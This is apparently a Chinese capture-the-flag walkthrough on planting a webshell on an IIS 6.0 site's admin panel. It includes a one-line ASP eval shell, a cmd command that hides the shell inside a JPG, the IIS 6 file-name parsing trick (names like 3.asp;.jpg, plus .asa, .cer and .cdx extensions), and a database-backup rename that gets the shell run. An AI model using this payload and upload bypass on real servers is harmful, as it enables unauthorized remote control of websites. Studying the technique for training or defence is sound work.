一般来说 给一个网站 都是先找出它的后台登录界面 过登录界面的方法很多 很多人都发过了 像sql注入 弱口令等 所以我们直接快进到网站后台登录界面 尝试挂马
1.找到文件上传的地方
差不多 网站都会做黑白名单的过滤 所以想要直接访问.asp .php .asa等之类的木马文件基本上行不通 所以我们换思路 拿这题做例子
通过burp发送响应包 我们发现中间件的版本 是iis6.0 我们首先想到解析漏洞
2.尝试利用解析漏洞上传木马文件
先利用cmd做一个简单的木马 copy copy 1.jpg/b+1.asp/a 2.jpg php同样适用
<%eval request("a")%>
将后缀名改为 3.asp;.jpg 顺便补充一点
后缀名为 .asa .cer .cdx 的文件都能被当做脚本执行
3.提交之后发现文件名依旧没变 但是我们知道了路径
4.接着我们在翻看网站时发现一个数据库备份的地方 我们就可以利用了
5.接着发现了数据库的备份目录
6.我们访问发现 有两个asa后缀名 访问失败
7.尝试去掉一个后缀名
8.出现乱码就说明 木马被当做脚本执行了 然后我们连接 蚁剑 (菜刀也可以)
成功访问后台 做题的时候 经常发现 数据库备份和文件上传配合 获取webshell